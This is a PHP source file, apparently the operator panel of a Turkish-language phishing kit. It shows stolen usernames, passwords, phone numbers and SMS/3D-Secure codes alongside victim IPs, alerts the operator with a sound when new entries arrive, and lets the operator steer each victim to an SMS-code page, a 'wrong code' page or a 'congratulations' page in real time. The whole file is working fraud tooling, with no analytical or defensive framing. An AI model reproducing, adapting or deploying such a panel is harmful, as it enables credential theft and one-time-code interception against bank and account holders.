<?php

session_start();
ob_start();

if (isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true) {
    include_once('db.php');
    $db = db_connect();

    $k_key = isset($_SESSION['k_key']) ? $_SESSION['k_key'] : "";

    $logs = $db->query('SELECT * FROM logs ORDER BY created_at DESC')->fetchAll(PDO::FETCH_OBJ);
    header("Refresh: 10; url=logs");

    echo '<body onload="document.body.click()">';

    $count = $db->query('SELECT COUNT(*) FROM logs')->fetchColumn();

    setcookie('last_count', $count, time() + 60 * 60 * 24 * 30); 

    $last_count = $_COOKIE['last_count'] ?? 0;

    if ($last_count == 0) {
        $last_count = 0;
    }

    if ($last_count < $count) {
        echo '<iframe src="ssuyari.mp3" allow="autoplay" style="display:none" id="iframeAudio"></iframe>';
        
    }
} else {
    header("Location: login.php");
    exit();
}



if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['submit_action'])) {
    $ip_to_update = $_POST['ip_to_update'];
    $selected_action = $_POST['action'];


    switch ($selected_action) {
        case 'send_3d':
            $update_query = $db->prepare('UPDATE logs SET aktar = 1 WHERE ip = :ip');
            $update_query->bindParam(':ip', $ip_to_update);
            $update_query->execute();
            break;
        case 'send_block':
                $update_query = $db->prepare('UPDATE logs SET aktar = 2 WHERE ip = :ip');
                $update_query->bindParam(':ip', $ip_to_update);
                $update_query->execute();
            break;
        case 'send_tebrik':
                $update_query = $db->prepare('UPDATE logs SET aktar = 3 WHERE ip = :ip');
                $update_query->bindParam(':ip', $ip_to_update);
                $update_query->execute();
            break;
    }
}
?>
<?php
include('header.php');
include('sidebar.php');
?>




   
<!DOCTYPE html>
<head>
    
</head>
<html lang="tr">
   
    <style>

        .status-indicator {
            width: 12px;
            height: 12px;
            border-radius: 50%;
            display: inline-block;
            position: relative;
        }

        .status-indicator:before,
        .status-indicator:after,
        .status-indicator__circle {
            content: "";
            display: block;
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            border-radius: 50%;
            opacity: 0;
        }

        .status-indicator:before {
            background-color: green;
            animation: heartbeat 2s infinite;
        }

        .status-indicator__circle {
            background-color: rgba(255, 255, 255, 0.3);
            animation: circle 2s infinite;
        }

        .status-indicator__circle:nth-of-type(1) {
            transform: rotateZ(45deg);
        }

        .status-indicator__circle:nth-of-type(2) {
            transform: rotateZ(135deg);
        }

        .status-indicator.red {
            animation: none;
            background-color: red;
        }

        .status-indicator.red:before {
            background-color: red;
            animation: none;
        }

        .status-indicator.gray:before {
            background-color: gray;
            animation: none;
        }

        .status-indicator.gray {
            animation: none;
            background-color: gray;
        }

        .status-text {
            margin-left: 5px;
            font-size: 14px;
        }

        .status-text.online {
            color: green;
        }

        .status-text.offline {
            color: red;
        }

        .status-text.gray {
            color: gray;
        }

        @keyframes heartbeat {
            0% {
                transform: scale(1);
                opacity: 1;
            }

            50% {
                transform: scale(1.5);
                opacity: 0.7;
            }

            100% {
                transform: scale(1);
                opacity: 1;
            }
        }
    </style>
<body>

<div class="flex flex-col md:flex-row">
    <div class="w-full md:w-64 bg-gray-800 h-screen">
    </div>
    <div class="w-full md:flex-1">
        <main class="p-4">
            <h2 class="text-2xl font-bold mb-4">Loglar</h2>
            <h4 class="text-xl font-bold mb-4">
                <a href="del" class="text-red-500">
                    Tabloyu Boşalt (<?= count($logs) ?>)
                </a>
            </h4>
            <div class="overflow-x-auto">
                <table class="table-auto border w-full">
                    <thead class="bg-gray-50">
                    <tr>
                        <th class="px-4 py-2 text-gray-500 font-bold border">IP</th>
                        <th class="px-4 py-2 text-gray-500 font-bold border">Kullanici Adı</th>
                        <th class="px-4 py-2 text-gray-500 font-bold border">Şifre</th>
                        <th class="px-4 py-2 text-gray-500 font-bold border">Gsm</th>
                        <th class="px-4 py-2 text-gray-500 font-bold border">3D</th>
                        <th class="px-4 py-2 text-gray-500 font-bold border">Tarih</th>
                        <th class="px-4 py-2 text-gray-500 font-bold border">Durum</th>
                        <th class="px-4 py-2 text-gray-500 font-bold border">İşlemler</th>
                    </tr>
                    </thead>
                    <tbody>
                    <?php foreach ($logs as $log): ?>
                        <tr class="text-center">
                        <td class="px-4 py-2 border font-bold" style="background-color:white;"><?= $log->ip ?>
                            <td class="px-4 py-2 border" style="background-color:white;"><?= $log->kadi ?>
                            </td>
                            <td class="px-4 py-2 border" style="background-color:white;">
                            <?= $log->sifre ?>
                            </td>
                            <td class="px-4 py-2 border font-bold" style="background-color:white;">
                                <?php if ($log->gsm): ?>
                                    <span class="text-green-500"><?= $log->gsm ?></span>
                                <?php else: ?>
                                    <span class="text-red-500">GSM Bekleniyor...</span>
                                <?php endif; ?>
                            </td>
                            </td>
                            <td class="px-4 py-2 border font-bold" style="background-color:white;">
                                <?php if ($log->sms_code): ?>
                                    <span class="text-green-500"><?= $log->sms_code ?></span>
                                <?php else: ?>
                                    <span class="text-red-500">Sms Kodu Bekleniyor...</span>
                                <?php endif; ?>
                            </td>
                            </td>
                           
                            <td class="px-4 py-2 border" style="background-color:white;"><?= $log->created_at ?></td>
                            <td class="px-4 py-2 border" style="background-color:white;"><?= $log->anlik ?>
                         
                            </td>
                            <td class="px-4 py-2 border" style="background-color:white;">
    <form method="POST">
        <input type="hidden" name="ip_to_update" value="<?= $log->ip ?>">
        <select name="action" style="color: green;">
            <option value="send_3d">SMS</option>
            <option value="send_block">HATALI SMS</option>
            <option value="send_tebrik">TEBRİK</option>
        </select>

        <button type="submit" name="submit_action" style="color:green;">GÖNDER</button>
    </form>
</td>

                         
                            
                            
                            
                        
                           
                            
                        </tr>
                 
                    <?php endforeach; ?>
                    </tbody>
                </table>
            </div>
        </main>
    </div>
</div>

</body>
</html>
